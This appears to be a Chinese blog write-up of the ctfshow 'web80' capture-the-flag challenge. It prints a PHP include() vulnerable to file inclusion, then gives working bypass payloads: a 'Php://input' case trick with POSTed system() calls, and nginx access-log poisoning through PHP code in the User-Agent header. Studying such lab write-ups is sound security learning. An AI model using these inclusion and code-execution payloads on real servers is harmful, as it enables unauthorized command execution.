[ctfshow web入门] web80

一口一个橘子2025-05-31 16:46

信息收集

过滤了phpdata

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码 
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

日志绕过

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
&白帝&2 小时前
前端实现截图的几种方法
前端
动能小子ohhh2 小时前
html实现登录与注册功能案例(不写死且只使用js)
开发语言·前端·javascript·python·html
小小小小宇2 小时前
大文件断点续传笔记
前端
Jimmy3 小时前
理解 React Context API: 实用指南
前端·javascript·react.js
保持学习ing3 小时前
SpringBoot电脑商城项目--显示勾选+确认订单页收货地址
java·前端·spring boot·后端·交互·jquery
雁無痕3 小时前
Quick Points 1 企业信息安全策略怎么做
网络安全
2501_915918413 小时前
还原线上 WebView 异常:手机端APP远程调试
websocket·网络协议·tcp/ip·http·网络安全·https·udp
李明一.3 小时前
Java 全栈开发学习:从后端基石到前端灵动的成长之路
java·前端·学习
观默4 小时前
我用AI造了个“懂我家娃”的育儿助手
前端·人工智能·产品
crary,记忆4 小时前
微前端MFE:(React 与 Angular)框架之间的通信方式
前端·javascript·学习·react.js·angular
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解03Coze扣子平台完整体验和实践(附国内和国际版对比)0438、基于卷积神经网络(CNN)的车牌自动识别系统(matlab)05DeepSeek各版本说明与优缺点分析06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07C# 项目:导线计算 / 坐标转换 / 曲线放样 / 水准网 / 导线网平差08AI Agent | Coze 插件使用指南:从功能解析到实操步骤09YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】10jdk21下载、安装(Windows、Linux、macOS)